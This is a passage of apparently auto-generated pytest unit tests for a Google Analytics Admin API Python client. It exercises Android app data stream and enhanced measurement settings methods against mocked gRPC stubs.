response = await client.delete_android_app_data_stream(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_delete_android_app_data_stream_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.delete_android_app_data_stream( analytics_admin.DeleteAndroidAppDataStreamRequest(), name="name_value", ) def test_update_android_app_data_stream( transport: str = "grpc", request_type=analytics_admin.UpdateAndroidAppDataStreamRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.AndroidAppDataStream( name="name_value", firebase_app_id="firebase_app_id_value", package_name="package_name_value", display_name="display_name_value", ) response = client.update_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateAndroidAppDataStreamRequest() # Establish that the response is the type that we expect. 
assert isinstance(response, resources.AndroidAppDataStream) assert response.name == "name_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.package_name == "package_name_value" assert response.display_name == "display_name_value" def test_update_android_app_data_stream_from_dict(): test_update_android_app_data_stream(request_type=dict) def test_update_android_app_data_stream_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_android_app_data_stream), "__call__" ) as call: client.update_android_app_data_stream() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateAndroidAppDataStreamRequest() @pytest.mark.asyncio async def test_update_android_app_data_stream_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateAndroidAppDataStreamRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.AndroidAppDataStream( name="name_value", firebase_app_id="firebase_app_id_value", package_name="package_name_value", display_name="display_name_value", ) ) response = await client.update_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateAndroidAppDataStreamRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.AndroidAppDataStream) assert response.name == "name_value" assert response.firebase_app_id == "firebase_app_id_value" assert response.package_name == "package_name_value" assert response.display_name == "display_name_value" @pytest.mark.asyncio async def test_update_android_app_data_stream_async_from_dict(): await test_update_android_app_data_stream_async(request_type=dict) def test_update_android_app_data_stream_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateAndroidAppDataStreamRequest() request.android_app_data_stream.name = "android_app_data_stream.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_android_app_data_stream), "__call__" ) as call: call.return_value = resources.AndroidAppDataStream() client.update_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. 
_, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "android_app_data_stream.name=android_app_data_stream.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_android_app_data_stream_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateAndroidAppDataStreamRequest() request.android_app_data_stream.name = "android_app_data_stream.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_android_app_data_stream), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.AndroidAppDataStream() ) await client.update_android_app_data_stream(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "android_app_data_stream.name=android_app_data_stream.name/value", ) in kw["metadata"] def test_update_android_app_data_stream_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.AndroidAppDataStream() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. 
client.update_android_app_data_stream( android_app_data_stream=resources.AndroidAppDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].android_app_data_stream == resources.AndroidAppDataStream( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_android_app_data_stream_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_android_app_data_stream( analytics_admin.UpdateAndroidAppDataStreamRequest(), android_app_data_stream=resources.AndroidAppDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_android_app_data_stream_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_android_app_data_stream), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.AndroidAppDataStream() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.AndroidAppDataStream() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_android_app_data_stream( android_app_data_stream=resources.AndroidAppDataStream(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. 
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].android_app_data_stream == resources.AndroidAppDataStream(
            name="name_value"
        )
        assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"])


@pytest.mark.asyncio
async def test_update_android_app_data_stream_flattened_error_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.update_android_app_data_stream(
            analytics_admin.UpdateAndroidAppDataStreamRequest(),
            android_app_data_stream=resources.AndroidAppDataStream(name="name_value"),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )


def test_list_android_app_data_streams(
    transport: str = "grpc",
    request_type=analytics_admin.ListAndroidAppDataStreamsRequest,
):
    # ListAndroidAppDataStreams: sync path returns a pager over the response.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_android_app_data_streams), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = analytics_admin.ListAndroidAppDataStreamsResponse(
            next_page_token="next_page_token_value",
        )
        response = client.list_android_app_data_streams(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListAndroidAppDataStreamsRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListAndroidAppDataStreamsPager)
    assert response.next_page_token == "next_page_token_value"


def test_list_android_app_data_streams_from_dict():
    # Exercise the sync path with a dict request body.
    test_list_android_app_data_streams(request_type=dict)


def test_list_android_app_data_streams_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_android_app_data_streams), "__call__"
    ) as call:
        client.list_android_app_data_streams()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListAndroidAppDataStreamsRequest()


@pytest.mark.asyncio
async def test_list_android_app_data_streams_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.ListAndroidAppDataStreamsRequest,
):
    # Async variant: the stub is awaited once and an async pager is returned.
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_android_app_data_streams), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.ListAndroidAppDataStreamsResponse(
                next_page_token="next_page_token_value",
            )
        )
        response = await client.list_android_app_data_streams(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.ListAndroidAppDataStreamsRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListAndroidAppDataStreamsAsyncPager)
    assert response.next_page_token == "next_page_token_value"


@pytest.mark.asyncio
async def test_list_android_app_data_streams_async_from_dict():
    await test_list_android_app_data_streams_async(request_type=dict)


def test_list_android_app_data_streams_field_headers():
    # Routing header "x-goog-request-params" must carry the parent field.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.ListAndroidAppDataStreamsRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.list_android_app_data_streams), "__call__"
    ) as call:
        call.return_value = analytics_admin.ListAndroidAppDataStreamsResponse()
        client.list_android_app_data_streams(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_list_android_app_data_streams_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.ListAndroidAppDataStreamsRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object( type(client.transport.list_android_app_data_streams), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListAndroidAppDataStreamsResponse() ) await client.list_android_app_data_streams(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_android_app_data_streams_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_android_app_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListAndroidAppDataStreamsResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_android_app_data_streams(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_android_app_data_streams_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_android_app_data_streams( analytics_admin.ListAndroidAppDataStreamsRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_android_app_data_streams_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.list_android_app_data_streams), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListAndroidAppDataStreamsResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListAndroidAppDataStreamsResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_android_app_data_streams(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_android_app_data_streams_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_android_app_data_streams( analytics_admin.ListAndroidAppDataStreamsRequest(), parent="parent_value", ) def test_list_android_app_data_streams_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_android_app_data_streams), "__call__" ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[ resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), ], next_page_token="abc", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[], next_page_token="def", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[resources.AndroidAppDataStream(),], next_page_token="ghi", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[ resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_android_app_data_streams(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.AndroidAppDataStream) for i in results) def test_list_android_app_data_streams_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_android_app_data_streams), "__call__" ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[ resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), ], next_page_token="abc", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[], next_page_token="def", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[resources.AndroidAppDataStream(),], next_page_token="ghi", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[ resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), ], ), RuntimeError, ) pages = list(client.list_android_app_data_streams(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_android_app_data_streams_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_android_app_data_streams), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[ resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), ], next_page_token="abc", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[], next_page_token="def", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[resources.AndroidAppDataStream(),], next_page_token="ghi", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[ resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), ], ), RuntimeError, ) async_pager = await client.list_android_app_data_streams(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.AndroidAppDataStream) for i in responses) @pytest.mark.asyncio async def test_list_android_app_data_streams_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_android_app_data_streams), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. 
call.side_effect = ( analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[ resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), ], next_page_token="abc", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[], next_page_token="def", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[resources.AndroidAppDataStream(),], next_page_token="ghi", ), analytics_admin.ListAndroidAppDataStreamsResponse( android_app_data_streams=[ resources.AndroidAppDataStream(), resources.AndroidAppDataStream(), ], ), RuntimeError, ) pages = [] async for page_ in ( await client.list_android_app_data_streams(request={}) ).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_get_enhanced_measurement_settings( transport: str = "grpc", request_type=analytics_admin.GetEnhancedMeasurementSettingsRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_enhanced_measurement_settings), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = resources.EnhancedMeasurementSettings( name="name_value", stream_enabled=True, page_views_enabled=True, scrolls_enabled=True, outbound_clicks_enabled=True, site_search_enabled=True, video_engagement_enabled=True, file_downloads_enabled=True, page_loads_enabled=True, page_changes_enabled=True, search_query_parameter="search_query_parameter_value", uri_query_parameter="uri_query_parameter_value", ) response = client.get_enhanced_measurement_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetEnhancedMeasurementSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.EnhancedMeasurementSettings) assert response.name == "name_value" assert response.stream_enabled is True assert response.page_views_enabled is True assert response.scrolls_enabled is True assert response.outbound_clicks_enabled is True assert response.site_search_enabled is True assert response.video_engagement_enabled is True assert response.file_downloads_enabled is True assert response.page_loads_enabled is True assert response.page_changes_enabled is True assert response.search_query_parameter == "search_query_parameter_value" assert response.uri_query_parameter == "uri_query_parameter_value" def test_get_enhanced_measurement_settings_from_dict(): test_get_enhanced_measurement_settings(request_type=dict) def test_get_enhanced_measurement_settings_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.get_enhanced_measurement_settings), "__call__" ) as call: client.get_enhanced_measurement_settings() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetEnhancedMeasurementSettingsRequest() @pytest.mark.asyncio async def test_get_enhanced_measurement_settings_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetEnhancedMeasurementSettingsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_enhanced_measurement_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.EnhancedMeasurementSettings( name="name_value", stream_enabled=True, page_views_enabled=True, scrolls_enabled=True, outbound_clicks_enabled=True, site_search_enabled=True, video_engagement_enabled=True, file_downloads_enabled=True, page_loads_enabled=True, page_changes_enabled=True, search_query_parameter="search_query_parameter_value", uri_query_parameter="uri_query_parameter_value", ) ) response = await client.get_enhanced_measurement_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetEnhancedMeasurementSettingsRequest() # Establish that the response is the type that we expect. 
assert isinstance(response, resources.EnhancedMeasurementSettings) assert response.name == "name_value" assert response.stream_enabled is True assert response.page_views_enabled is True assert response.scrolls_enabled is True assert response.outbound_clicks_enabled is True assert response.site_search_enabled is True assert response.video_engagement_enabled is True assert response.file_downloads_enabled is True assert response.page_loads_enabled is True assert response.page_changes_enabled is True assert response.search_query_parameter == "search_query_parameter_value" assert response.uri_query_parameter == "uri_query_parameter_value" @pytest.mark.asyncio async def test_get_enhanced_measurement_settings_async_from_dict(): await test_get_enhanced_measurement_settings_async(request_type=dict) def test_get_enhanced_measurement_settings_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetEnhancedMeasurementSettingsRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_enhanced_measurement_settings), "__call__" ) as call: call.return_value = resources.EnhancedMeasurementSettings() client.get_enhanced_measurement_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. 
_, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_enhanced_measurement_settings_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetEnhancedMeasurementSettingsRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_enhanced_measurement_settings), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.EnhancedMeasurementSettings() ) await client.get_enhanced_measurement_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_enhanced_measurement_settings_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_enhanced_measurement_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.EnhancedMeasurementSettings() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_enhanced_measurement_settings(name="name_value",) # Establish that the underlying call was made with the expected # request object values. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_enhanced_measurement_settings_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_enhanced_measurement_settings( analytics_admin.GetEnhancedMeasurementSettingsRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_enhanced_measurement_settings_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_enhanced_measurement_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.EnhancedMeasurementSettings() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.EnhancedMeasurementSettings() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_enhanced_measurement_settings(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_enhanced_measurement_settings_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.get_enhanced_measurement_settings( analytics_admin.GetEnhancedMeasurementSettingsRequest(), name="name_value", ) def test_update_enhanced_measurement_settings( transport: str = "grpc", request_type=analytics_admin.UpdateEnhancedMeasurementSettingsRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_enhanced_measurement_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.EnhancedMeasurementSettings( name="name_value", stream_enabled=True, page_views_enabled=True, scrolls_enabled=True, outbound_clicks_enabled=True, site_search_enabled=True, video_engagement_enabled=True, file_downloads_enabled=True, page_loads_enabled=True, page_changes_enabled=True, search_query_parameter="search_query_parameter_value", uri_query_parameter="uri_query_parameter_value", ) response = client.update_enhanced_measurement_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateEnhancedMeasurementSettingsRequest() # Establish that the response is the type that we expect. 
assert isinstance(response, resources.EnhancedMeasurementSettings) assert response.name == "name_value" assert response.stream_enabled is True assert response.page_views_enabled is True assert response.scrolls_enabled is True assert response.outbound_clicks_enabled is True assert response.site_search_enabled is True assert response.video_engagement_enabled is True assert response.file_downloads_enabled is True assert response.page_loads_enabled is True assert response.page_changes_enabled is True assert response.search_query_parameter == "search_query_parameter_value" assert response.uri_query_parameter == "uri_query_parameter_value" def test_update_enhanced_measurement_settings_from_dict(): test_update_enhanced_measurement_settings(request_type=dict) def test_update_enhanced_measurement_settings_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_enhanced_measurement_settings), "__call__" ) as call: client.update_enhanced_measurement_settings() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateEnhancedMeasurementSettingsRequest() @pytest.mark.asyncio async def test_update_enhanced_measurement_settings_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateEnhancedMeasurementSettingsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.update_enhanced_measurement_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.EnhancedMeasurementSettings( name="name_value", stream_enabled=True, page_views_enabled=True, scrolls_enabled=True, outbound_clicks_enabled=True, site_search_enabled=True, video_engagement_enabled=True, file_downloads_enabled=True, page_loads_enabled=True, page_changes_enabled=True, search_query_parameter="search_query_parameter_value", uri_query_parameter="uri_query_parameter_value", ) ) response = await client.update_enhanced_measurement_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateEnhancedMeasurementSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.EnhancedMeasurementSettings) assert response.name == "name_value" assert response.stream_enabled is True assert response.page_views_enabled is True assert response.scrolls_enabled is True assert response.outbound_clicks_enabled is True assert response.site_search_enabled is True assert response.video_engagement_enabled is True assert response.file_downloads_enabled is True assert response.page_loads_enabled is True assert response.page_changes_enabled is True assert response.search_query_parameter == "search_query_parameter_value" assert response.uri_query_parameter == "uri_query_parameter_value" @pytest.mark.asyncio async def test_update_enhanced_measurement_settings_async_from_dict(): await test_update_enhanced_measurement_settings_async(request_type=dict) def test_update_enhanced_measurement_settings_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. 
